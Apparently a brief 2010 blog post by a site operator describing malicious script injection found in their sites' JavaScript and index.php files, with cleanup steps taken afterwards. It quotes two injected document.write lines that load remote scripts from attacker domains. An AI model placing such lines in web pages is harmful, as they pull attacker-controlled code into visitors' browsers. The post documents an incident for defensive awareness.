It was September 21,2010 when Javascript is malfunctioning in one of our website. The effects are not showing the way it was coded. I checked the javascript files as well the JQUERY framework and found something suspicious. There is a line that looks like this
document.write('<script type="text/javascript" src="http://alienradar.ru/LCD.js"></script>');Then the next day, 3 on our sites are reported by google as malware distributing site. Like the other website, I also found some malicious code in the javascript file as well as the index.php file but now with different js name.
document.write('<script type="text/javascript" src="http://addonrock.ru/firewall.js"></script>');This is script has a domain name of .ru which means russia including:
alienradar.ru and addonrock.ru
This is some informations that we have regarding this script injecting virus.
- It attacks the vulnerabilities of opensource javascript frameworks and plugins like JQUERY.
These are the steps we have done
- We removed all injected scripts in our websites
- we rebooted our web server
- requested a review from google
- Update your Javascript framework into the latest one.
0 Comments:
Post a Comment